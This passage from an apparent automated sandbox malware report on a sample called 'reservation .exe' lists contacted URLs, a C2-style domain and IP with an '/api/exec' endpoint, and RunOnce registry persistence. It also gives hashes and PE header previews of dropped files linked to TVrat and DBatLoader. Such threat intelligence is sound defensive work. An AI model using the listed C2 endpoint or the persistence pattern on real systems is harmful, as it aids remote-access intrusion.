                                                                                                https://id.xn--80akicokc0aablc.xn--p1ai00ast.exe, 0000000A.00000002.3306161257.0000000000DBB000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                • Avira URL Cloud: safe
                                                                                                		unknown
                                                                                                https://sectigo.com/CPS0xcopy.exe, 00000008.00000003.2451867441.0000000003108000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000008.00000003.2454251899.0000000002EA8000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000008.00000003.2454713118.0000000002EA8000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000008.00000003.2459594021.0000000002EA9000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000008.00000003.2455429869.0000000002EBF000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000008.00000003.2456715536.000000000313E000.00000004.00000020.00020000.00000000.sdmp, is-RFQHO.tmp.4.dr, is-8MMT6.tmp.4.drfalse
                                                                                                  		high
                                                                                                  https://www.openssl.org/docs/faq.htmlxcopy.exe, 00000008.00000003.2457697380.000000000310F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                    		high
                                                                                                    https://id.xn--80akicokc0aablc.xn--p1aieYast.exe, 0000000A.00000002.3307636336.0000000002F24000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                    • Avira URL Cloud: safe
                                                                                                    		unknown
                                                                                                    https://id.xn--80akicokc0aablc.xn--p1ai:44335...ast.exe, 0000000A.00000002.3309198121.000000000311B000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                    • Avira URL Cloud: safe
                                                                                                    		unknown
                                                                                                    https://id.xn--80akicokc0aablc.xn--p1aidllast.exe, 0000000A.00000003.3183555638.0000000005BFB000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000003.3073381090.0000000005C35000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                    • Avira URL Cloud: safe
                                                                                                    		unknown
                                                                                                    https://id.xn--80akicokc0aablc.xn--p1aidllmast.exe, 0000000A.00000002.3322683873.0000000005C68000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                    • Avira URL Cloud: safe
                                                                                                    		unknown
                                                                                                    https://id.xn-ast.exe, 0000000A.00000003.3183555638.0000000005C1E000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000003.2835183941.0000000005C31000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000003.2895606355.0000000005C1F000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000003.3299966293.0000000005C23000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000003.2914485845.0000000005C1F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                    • Avira URL Cloud: safe
                                                                                                    		unknown
                                                                                                    http://crl.sectigo.com/SectigoRSATimeStampingCA.crl0txcopy.exe, 00000008.00000003.2451867441.0000000003108000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000008.00000003.2454251899.0000000002EA8000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000008.00000003.2454713118.0000000002EA8000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000008.00000003.2459594021.0000000002EA9000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000008.00000003.2455429869.0000000002EBF000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000008.00000003.2456715536.000000000313E000.00000004.00000020.00020000.00000000.sdmp, is-RFQHO.tmp.4.dr, is-8MMT6.tmp.4.drfalse
                                                                                                      		high
                                                                                                      https://id.xn--80akicokc0aablc.xn--p1ai:443ghast.exe, 0000000A.00000002.3321452635.0000000005C1F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                      • Avira URL Cloud: safe
                                                                                                      		unknown

                                                                                                      World Map of Contacted IPs

                                                                                                      • No. of IPs < 25%
                                                                                                      • 25% < No. of IPs < 50%
                                                                                                      • 50% < No. of IPs < 75%
                                                                                                      • 75% < No. of IPs

                                                                                                      Public IPs

                                                                                                      IPDomainCountryFlagASNASN NameMalicious
                                                                                                      212.193.169.65
                                                                                                      		id.xn--80akicokc0aablc.xn--p1aiRussian Federation
                                                                                                      		60329SAFIB-ASRUfalse

                                                                                                      Private

                                                                                                      IP
                                                                                                      127.0.0.1

                                                                                                      General Information

                                                                                                      Joe Sandbox version:41.0.0 Charoite
                                                                                                      Analysis ID:1558751
                                                                                                      Start date and time:2024-11-19 19:13:08 +01:00
                                                                                                      Joe Sandbox product:CloudBasic
                                                                                                      Overall analysis duration:0h 11m 45s
                                                                                                      Hypervisor based Inspection enabled:false
                                                                                                      Report type:full
                                                                                                      Cookbook file name:default.jbs
                                                                                                      Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                      Number of analysed new started processes analysed:13
                                                                                                      Number of new started drivers analysed:0
                                                                                                      Number of existing processes analysed:0
                                                                                                      Number of existing drivers analysed:0
                                                                                                      Number of injected processes analysed:0
                                                                                                      Technologies:
                                                                                                      • HCA enabled
                                                                                                      • EGA enabled
                                                                                                      • AMSI enabled
                                                                                                      Analysis Mode:default
                                                                                                      Analysis stop reason:Timeout
                                                                                                      Sample name:reservation .exe
                                                                                                      Detection:MAL
                                                                                                      Classification:mal84.troj.evad.winEXE@16/63@1/2
                                                                                                      EGA Information:
                                                                                                      • Successful, ratio: 100%
                                                                                                      HCA Information:Failed
                                                                                                      Cookbook Comments:
                                                                                                      • Found application associated with file extension: .exe

                                                                                                      Warnings

                                                                                                      • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
                                                                                                      • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                                                                      • Not all processes where analyzed, report is missing behavior information
                                                                                                      • Report creation exceeded maximum time and may have missing disassembly code information.
                                                                                                      • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                      • Report size getting too big, too many NtDeviceIoControlFile calls found.
                                                                                                      • Report size getting too big, too many NtEnumerateKey calls found.
                                                                                                      • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                      • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                      • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                      • Report size getting too big, too many NtSetInformationFile calls found.
                                                                                                      • VT rate limit hit for: reservation .exe

                                                                                                      Simulations

                                                                                                      Behavior and APIs

                                                                                                      TimeTypeDescription
                                                                                                      13:15:10API Interceptor3241x Sleep call for process: ast.exe modified
                                                                                                      19:15:14AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce fat C:\Users\user\AppData\Roaming\fat\ast.exe
                                                                                                      19:15:22AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\RunOnce fat C:\Users\user\AppData\Roaming\fat\ast.exe

                                                                                                      Joe Sandbox View / Context

                                                                                                      IPs

                                                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                      212.193.169.651.exeGet hashmaliciousDBatLoader, TVratBrowse
                                                                                                      • id.xn--80akicokc0aablc.xn--p1ai:443http://id.xn--80akicokc0aablc.xn--p1ai:443/api/exec
                                                                                                      scan_9374673_Medoc.pdf.exeGet hashmaliciousDBatLoader, TVratBrowse
                                                                                                      • id.xn--80akicokc0aablc.xn--p1ai:80http://id.xn--80akicokc0aablc.xn--p1ai:80/api/exec

                                                                                                      Domains

                                                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                      id.xn--80akicokc0aablc.xn--p1aioZ3vtWXObB.exeGet hashmaliciousTVratBrowse
                                                                                                      • 212.193.169.65
                                                                                                      aeyh21MAtA.exeGet hashmaliciousTVratBrowse
                                                                                                      • 212.193.169.65
                                                                                                      wjpP1EOX0L.exeGet hashmaliciousTVratBrowse
                                                                                                      • 212.193.169.65
                                                                                                      oZ3vtWXObB.exeGet hashmaliciousTVratBrowse
                                                                                                      • 212.193.169.65
                                                                                                      aeyh21MAtA.exeGet hashmaliciousTVratBrowse
                                                                                                      • 212.193.169.65
                                                                                                      wjpP1EOX0L.exeGet hashmaliciousTVratBrowse
                                                                                                      • 212.193.169.65
                                                                                                      1.exeGet hashmaliciousDBatLoader, TVratBrowse
                                                                                                      • 212.193.169.65
                                                                                                      1.exeGet hashmaliciousDBatLoader, TVratBrowse
                                                                                                      • 212.193.169.65
                                                                                                      scan_9374673_Medoc.pdf.exeGet hashmaliciousDBatLoader, TVratBrowse
                                                                                                      • 185.40.77.244
                                                                                                      scan_9374673_Medoc.pdf.exeGet hashmaliciousDBatLoader, TVratBrowse
                                                                                                      • 185.40.77.244

                                                                                                      ASNs

                                                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                      SAFIB-ASRUoZ3vtWXObB.exeGet hashmaliciousTVratBrowse
                                                                                                      • 212.193.169.65
                                                                                                      aeyh21MAtA.exeGet hashmaliciousTVratBrowse
                                                                                                      • 212.193.169.65
                                                                                                      wjpP1EOX0L.exeGet hashmaliciousTVratBrowse
                                                                                                      • 212.193.169.65
                                                                                                      PkWnPA8l7C.exeGet hashmaliciousDBatLoader, TVratBrowse
                                                                                                      • 212.193.169.68
                                                                                                      oZ3vtWXObB.exeGet hashmaliciousTVratBrowse
                                                                                                      • 212.193.169.65
                                                                                                      aeyh21MAtA.exeGet hashmaliciousTVratBrowse
                                                                                                      • 212.193.169.65
                                                                                                      wjpP1EOX0L.exeGet hashmaliciousTVratBrowse
                                                                                                      • 212.193.169.65
                                                                                                      1.exeGet hashmaliciousDBatLoader, TVratBrowse
                                                                                                      • 212.193.169.65
                                                                                                      1.exeGet hashmaliciousDBatLoader, TVratBrowse
                                                                                                      • 212.193.169.68
                                                                                                      scan_9374673_Medoc.pdf.exeGet hashmaliciousDBatLoader, TVratBrowse
                                                                                                      • 212.193.169.68

                                                                                                      JA3 Fingerprints

                                                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                      74954a0c86284d0d6e1c4efefe92b521oZ3vtWXObB.exeGet hashmaliciousTVratBrowse
                                                                                                      • 212.193.169.65
                                                                                                      aeyh21MAtA.exeGet hashmaliciousTVratBrowse
                                                                                                      • 212.193.169.65
                                                                                                      wjpP1EOX0L.exeGet hashmaliciousTVratBrowse
                                                                                                      • 212.193.169.65
                                                                                                      PkWnPA8l7C.exeGet hashmaliciousDBatLoader, TVratBrowse
                                                                                                      • 212.193.169.65
                                                                                                      oZ3vtWXObB.exeGet hashmaliciousTVratBrowse
                                                                                                      • 212.193.169.65
                                                                                                      aeyh21MAtA.exeGet hashmaliciousTVratBrowse
                                                                                                      • 212.193.169.65
                                                                                                      wjpP1EOX0L.exeGet hashmaliciousTVratBrowse
                                                                                                      • 212.193.169.65
                                                                                                      avast_free_antivirus_setup_online.exeGet hashmaliciousUnknownBrowse
                                                                                                      • 212.193.169.65
                                                                                                      avast_free_antivirus_setup_online.exeGet hashmaliciousUnknownBrowse
                                                                                                      • 212.193.169.65
                                                                                                      file.exeGet hashmaliciousUnknownBrowse
                                                                                                      • 212.193.169.65

                                                                                                      Dropped Files

                                                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                      C:\Users\user\AppData\Local\Temp\is-BE9V9.tmp\_isetup\_iscrypt.dlloZ3vtWXObB.exeGet hashmaliciousTVratBrowse
                                                                                                        aeyh21MAtA.exeGet hashmaliciousTVratBrowse
                                                                                                          wjpP1EOX0L.exeGet hashmaliciousTVratBrowse
                                                                                                            PkWnPA8l7C.exeGet hashmaliciousDBatLoader, TVratBrowse
                                                                                                              oZ3vtWXObB.exeGet hashmaliciousTVratBrowse
                                                                                                                aeyh21MAtA.exeGet hashmaliciousTVratBrowse
                                                                                                                  wjpP1EOX0L.exeGet hashmaliciousTVratBrowse
                                                                                                                    1.exeGet hashmaliciousDBatLoader, TVratBrowse
                                                                                                                      1.exeGet hashmaliciousDBatLoader, TVratBrowse
                                                                                                                        i7j22nof2Q.exeGet hashmaliciousSocks5SystemzBrowse

                                                                                                                          Created / dropped Files

                                                                                                                          C:\Users\user\AppData\Local\Temp\is-4SM5O.tmp\reservation .tmp

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\reservation .exe
                                                                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):3152384
                                                                                                                          Entropy (8bit):6.384961431993512
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:49152:UWGtLBcXqFpBR6SVb8kq4pgquLMMji4NYxtJpkxhGjIHTbh333tkru:AtLutqgwh4NYxtJpkxhGi333tki
                                                                                                                          MD5:D3E870E4BBE9AAF106AB9B0510956A89
                                                                                                                          SHA1:C8B7A473A78E1EDB74116533B24BC87F1D9DE686
                                                                                                                          SHA-256:1E46C7F1CE79E5D5D3A8049B6610B74DA8905D1C796119C7159B92D071B47F36
                                                                                                                          SHA-512:D904BF73A5DC77D92847DE2AC5662CD1442E491B60A3495AC971AD2BB1F3D621D2F74AF3B4729B27C96D61EAC66833DB96665C798285E7495AD3D355CEE02756
                                                                                                                          Malicious:false
                                                                                                                          Antivirus:
                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                          Reputation:low
                                                                                                                          Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L......c.................L,.........hf,......p,...@...........................1...........@......@....................-.......-..9......|............................................................................-.......-......................text.... ,......",................. ..`.itext...(...@,..*...&,............. ..`.data...X....p,......P,.............@....bss.....y....-..........................idata...9....-..:....,.............@....didata.......-.......-.............@....edata........-......*-.............@..@.tls....L.....-..........................rdata..]............,-.............@..@.rsrc...|.............-.............@..@..............1.......0.............@..@........................................................

                                                                                                                          C:\Users\user\AppData\Local\Temp\is-BE9V9.tmp\_isetup\_iscrypt.dll

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-4SM5O.tmp\reservation .tmp
                                                                                                                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):2560
                                                                                                                          Entropy (8bit):2.8818118453929262
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:24:e1GSgDIX566lIB6SXvVmMPUjvhBrDsqZ:SgDKRlVImgUNBsG
                                                                                                                          MD5:A69559718AB506675E907FE49DEB71E9
                                                                                                                          SHA1:BC8F404FFDB1960B50C12FF9413C893B56F2E36F
                                                                                                                          SHA-256:2F6294F9AA09F59A574B5DCD33BE54E16B39377984F3D5658CDA44950FA0F8FC
                                                                                                                          SHA-512:E52E0AA7FE3F79E36330C455D944653D449BA05B2F9ABEE0914A0910C3452CFA679A40441F9AC696B3CCF9445CBB85095747E86153402FC362BB30AC08249A63
                                                                                                                          Malicious:false
                                                                                                                          Antivirus:
                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                          Joe Sandbox View:
                                                                                                                          • Filename: oZ3vtWXObB.exe, Detection: malicious, Browse
                                                                                                                          • Filename: aeyh21MAtA.exe, Detection: malicious, Browse
                                                                                                                          • Filename: wjpP1EOX0L.exe, Detection: malicious, Browse
                                                                                                                          • Filename: PkWnPA8l7C.exe, Detection: malicious, Browse
                                                                                                                          • Filename: oZ3vtWXObB.exe, Detection: malicious, Browse
                                                                                                                          • Filename: aeyh21MAtA.exe, Detection: malicious, Browse
                                                                                                                          • Filename: wjpP1EOX0L.exe, Detection: malicious, Browse
                                                                                                                          • Filename: 1.exe, Detection: malicious, Browse
                                                                                                                          • Filename: 1.exe, Detection: malicious, Browse
                                                                                                                          • Filename: i7j22nof2Q.exe, Detection: malicious, Browse
                                                                                                                          Reputation:high, very likely benign file
                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........W.c.W.c.W.c...>.T.c.W.b.V.c.R.<.V.c.R.?.V.c.R.9.V.c.RichW.c.........................PE..L....b.@...........!......................... ...............................@......................................p ..}.... ..(............................0....................................................... ...............................text............................... ..`.rdata....... ......................@..@.reloc.......0......................@..B................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                          C:\Users\user\AppData\Local\Temp\is-BE9V9.tmp\_isetup\_setup64.tmp

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-4SM5O.tmp\reservation .tmp
                                                                                                                          File Type:PE32+ executable (console) x86-64, for MS Windows
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):6144
                                                                                                                          Entropy (8bit):4.720366600008286
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:96:sfkcXegaJ/ZAYNzcld1xaX12p+gt1sONA0:sfJEVYlvxaX12C6A0
                                                                                                                          MD5:E4211D6D009757C078A9FAC7FF4F03D4
                                                                                                                          SHA1:019CD56BA687D39D12D4B13991C9A42EA6BA03DA
                                                                                                                          SHA-256:388A796580234EFC95F3B1C70AD4CB44BFDDC7BA0F9203BF4902B9929B136F95
                                                                                                                          SHA-512:17257F15D843E88BB78ADCFB48184B8CE22109CC2C99E709432728A392AFAE7B808ED32289BA397207172DE990A354F15C2459B6797317DA8EA18B040C85787E
                                                                                                                          Malicious:false
                                                                                                                          Antivirus:
                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......^...............l...............=\......=\......=\......Rich............................PE..d.....R..........#............................@.............................`.......,......................................................<!.......P..H....@..0.................................................................... ...............................text............................... ..`.rdata..|.... ......................@..@.data...,....0......................@....pdata..0....@......................@..@.rsrc...H....P......................@..@................................................................................................................................................................................................................................................................................................................................

                                                                                                                          C:\Users\user\AppData\Local\Temp\is-GMPCP.tmp\reservation .tmp

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\reservation .exe
                                                                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):3152384
                                                                                                                          Entropy (8bit):6.384961431993512
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:49152:UWGtLBcXqFpBR6SVb8kq4pgquLMMji4NYxtJpkxhGjIHTbh333tkru:AtLutqgwh4NYxtJpkxhGi333tki
                                                                                                                          MD5:D3E870E4BBE9AAF106AB9B0510956A89
                                                                                                                          SHA1:C8B7A473A78E1EDB74116533B24BC87F1D9DE686
                                                                                                                          SHA-256:1E46C7F1CE79E5D5D3A8049B6610B74DA8905D1C796119C7159B92D071B47F36
                                                                                                                          SHA-512:D904BF73A5DC77D92847DE2AC5662CD1442E491B60A3495AC971AD2BB1F3D621D2F74AF3B4729B27C96D61EAC66833DB96665C798285E7495AD3D355CEE02756
                                                                                                                          Malicious:false
                                                                                                                          Antivirus:
                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                          Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L......c.................L,.........hf,......p,...@...........................1...........@......@....................-.......-..9......|............................................................................-.......-......................text.... ,......",................. ..`.itext...(...@,..*...&,............. ..`.data...X....p,......P,.............@....bss.....y....-..........................idata...9....-..:....,.............@....didata.......-.......-.............@....edata........-......*-.............@..@.tls....L.....-..........................rdata..]............,-.............@..@.rsrc...|.............-.............@..@..............1.......0.............@..@........................................................

                                                                                                                          C:\Users\user\AppData\Local\Temp\is-I3C98.tmp\_isetup\_iscrypt.dll

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-GMPCP.tmp\reservation .tmp
                                                                                                                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):2560
                                                                                                                          Entropy (8bit):2.8818118453929262
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:24:e1GSgDIX566lIB6SXvVmMPUjvhBrDsqZ:SgDKRlVImgUNBsG
                                                                                                                          MD5:A69559718AB506675E907FE49DEB71E9
                                                                                                                          SHA1:BC8F404FFDB1960B50C12FF9413C893B56F2E36F
                                                                                                                          SHA-256:2F6294F9AA09F59A574B5DCD33BE54E16B39377984F3D5658CDA44950FA0F8FC
                                                                                                                          SHA-512:E52E0AA7FE3F79E36330C455D944653D449BA05B2F9ABEE0914A0910C3452CFA679A40441F9AC696B3CCF9445CBB85095747E86153402FC362BB30AC08249A63
                                                                                                                          Malicious:false
                                                                                                                          Antivirus:
                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........W.c.W.c.W.c...>.T.c.W.b.V.c.R.<.V.c.R.?.V.c.R.9.V.c.RichW.c.........................PE..L....b.@...........!......................... ...............................@......................................p ..}.... ..(............................0....................................................... ...............................text............................... ..`.rdata....... ......................@..@.reloc.......0......................@..B................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                          C:\Users\user\AppData\Local\Temp\is-I3C98.tmp\_isetup\_setup64.tmp

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-GMPCP.tmp\reservation .tmp
                                                                                                                          File Type:PE32+ executable (console) x86-64, for MS Windows
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):6144
                                                                                                                          Entropy (8bit):4.720366600008286
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:96:sfkcXegaJ/ZAYNzcld1xaX12p+gt1sONA0:sfJEVYlvxaX12C6A0
                                                                                                                          MD5:E4211D6D009757C078A9FAC7FF4F03D4
                                                                                                                          SHA1:019CD56BA687D39D12D4B13991C9A42EA6BA03DA
                                                                                                                          SHA-256:388A796580234EFC95F3B1C70AD4CB44BFDDC7BA0F9203BF4902B9929B136F95
                                                                                                                          SHA-512:17257F15D843E88BB78ADCFB48184B8CE22109CC2C99E709432728A392AFAE7B808ED32289BA397207172DE990A354F15C2459B6797317DA8EA18B040C85787E
                                                                                                                          Malicious:false
                                                                                                                          Antivirus:
                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......^...............l...............=\......=\......=\......Rich............................PE..d.....R..........#............................@.............................`.......,......................................................<!.......P..H....@..0.................................................................... ...............................text............................... ..`.rdata..|.... ......................@..@.data...,....0......................@....pdata..0....@......................@..@.rsrc...H....P......................@..@................................................................................................................................................................................................................................................................................................................................

                                                                                                                          C:\Users\user\AppData\Local\Temp\qilq\2teu9t.cfg (copy)

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-4SM5O.tmp\reservation .tmp
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):43
                                                                                                                          Entropy (8bit):5.286729870981167
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:3:SYMGa4VOUbLDFwozJO+n:SBU/Bwoz7n
                                                                                                                          MD5:33118193A9FD63FBCF60AE73FC60199E
                                                                                                                          SHA1:8DAFC111E44FABAE3EAD8325BB03E97871393D99
                                                                                                                          SHA-256:1E0DB7EB8AA0E8D9203FBB39753E82D6077A867ADF93D438CE24333686793159
                                                                                                                          SHA-512:647F151D68094BCCC313006C6BCA06505A2EBDE58C014901D71FFED01285172F124EF0FA400A6481D30BFBA021C674959AF0D2061BB11466A28BB79C096A20E5
                                                                                                                          Malicious:false
                                                                                                                          Preview:.>..i"_(..9E..+.S-..;.f.-.si..MZ......c:...

                                                                                                                          C:\Users\user\AppData\Local\Temp\qilq\AstCrp.dll (copy)

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-4SM5O.tmp\reservation .tmp
                                                                                                                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):172216
                                                                                                                          Entropy (8bit):6.698242571688099
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:3072:nGhQI/PxvCWRDvcDfo0F5HekeyO54ECV0/sMHL0WPCCb5rAg0Fujx8E0/3xt9qKv:kPxqWYF5HkyDLMsOzrAOL23VqK28j
                                                                                                                          MD5:CF1169A87FE6266C7B457A2424DA69DA
                                                                                                                          SHA1:5ADD67DEFD4CA56C1E9C0B239899EA699B140B64
                                                                                                                          SHA-256:24E01FD95225E260CDD41015A70374A048568D4DF6681B3D44EAABCB1EA03EAF
                                                                                                                          SHA-512:7BF76EB5B4E31A65931AF730909FBF848334BC98DA279E291E186FCAFDC81C76D1EF0EFEC4E00B8EAEDE6F8D130DA8B6B3D3C5DD8C14C6DCD3BCDC7D050A4B66
                                                                                                                          Malicious:false
                                                                                                                          Antivirus:
                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......m.%.).K.).K.).K.r.H.$.K.r.N...K.r.O.?.K...J.-.K.{.H.=.K.{.N...K.{.O...K.r.J...K.).J...K...B.!.K...K.(.K.....(.K.)..(.K...I.(.K.Rich).K.................PE..L.....@a...........!.....t...........V..............................................B.....@.........................`X..h....X..P.......(............|...$...........H..8............................H..@...............8............................text....s.......t.................. ..`.rdata...............x..............@..@.data........p.......P..............@....rsrc...(............\..............@..@.reloc...............b..............@..B................................................................................................................................................................................................................................................................................

                                                                                                                          C:\Users\user\AppData\Local\Temp\qilq\ast.exe (copy)

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-4SM5O.tmp\reservation .tmp
                                                                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):7543992
                                                                                                                          Entropy (8bit):6.717610928993395
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:98304:q0f/bCIDcCkgVmZqIXrdoXj++CEKDFBaVOGizeKFUtqiAp+hRWmMLlJ7p1:X/bCIPkgVpycKDFqOLNUtqiAz
                                                                                                                          MD5:8002D9E5851728EB024B398CF19DE390
                                                                                                                          SHA1:9A1DC7134F3F6FCCB37DFC4DDDA35DFA2875095E
                                                                                                                          SHA-256:B8DDE42C70D8C4A3511D5EDFFBC9F7F0C03DBDA980E29693E71344F76DA6BB0F
                                                                                                                          SHA-512:6936B6B01F9FC2F2F69DE6AE468A9F7173239BD003AD8B7BC7336C4DD4DB50457E20EC6783B2E8A166D684A56F3F1E9FB701CA903DF3F74E3CA25C46B8A8D00E
                                                                                                                          Malicious:true
                                                                                                                          Antivirus:
                                                                                                                          • Antivirus: ReversingLabs, Detection: 12%
                                                                                                                          Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L.....@a..................K..`'.......K.......K...@...........................y.......s..........@............................S..m....X..f ...........r..$... T.8d............T...............T.....................@.S..............................text... .J.......J................. ..`.itext..$.....J.......J............. ..`.data...T"....K..$....K.............@....bss..........M.......M..................idata...m....S..n....M.............@....tls....D.....T......*N..................rdata..#.....T......*N.............@..@.reloc..8d... T..f...,N.............@..B.rsrc....f ...X..f ...R.............@..@..............y.......r.............@..@................................................................................................

                                                                                                                          C:\Users\user\AppData\Local\Temp\qilq\astclient.dll (copy)

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-4SM5O.tmp\reservation .tmp
                                                                                                                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):581304
                                                                                                                          Entropy (8bit):6.580382227041057
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:12288:bj4Q3+oAscridrDg76u3HsBTc9GtIGPi2Emvh5/kJSMl0yomcY/nRwl2Sp:bHYXSTMGtNPitm1yomJ/n+tp
                                                                                                                          MD5:CDC5A8221738C1CA66564755BB58138C
                                                                                                                          SHA1:EF096A2CAF133D217C202C147855F2CEE7ECD105
                                                                                                                          SHA-256:DF5CEF85E92C6FFFAAC0ACDCE645AED3C5FA1F8FE7F9700D84CA08468AD3D5E3
                                                                                                                          SHA-512:A9F3E256518771C1C97374E7AE3EE19EBEC0D794CD740E059DBC8289356CF1FB5D4A19F2677DB2ADBB179A73520AAEC67947DCF4C8BCD930206DE4B6CDCAD4C6
                                                                                                                          Malicious:true
                                                                                                                          Antivirus:
                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......9...}..O}..O}..O.|*Ol..O.|(O...O.|)Oc..O/..Nd..O/..N...O/..N_..O...Ol..O}..O...O..Nh..O..N|..O.$O|..O}.LO|..O..N|..ORich}..O........PE..L...L..a...........!..... ...........m.......0......................................C.....@.........................0...P...............0................$.......[......p..............................@............0...............................text............ .................. ..`.rdata..H....0.......$..............@..@.data....d... ...D..................@....rsrc...0............X..............@..@.reloc...[.......\...^..............@..B................................................................................................................................................................................................................................................................................................

                                                                                                                          C:\Users\user\AppData\Local\Temp\qilq\astrct.dll (copy)

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-4SM5O.tmp\reservation .tmp
                                                                                                                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):1724088
                                                                                                                          Entropy (8bit):6.573221633911959
                                                                                                                          Encrypted:false
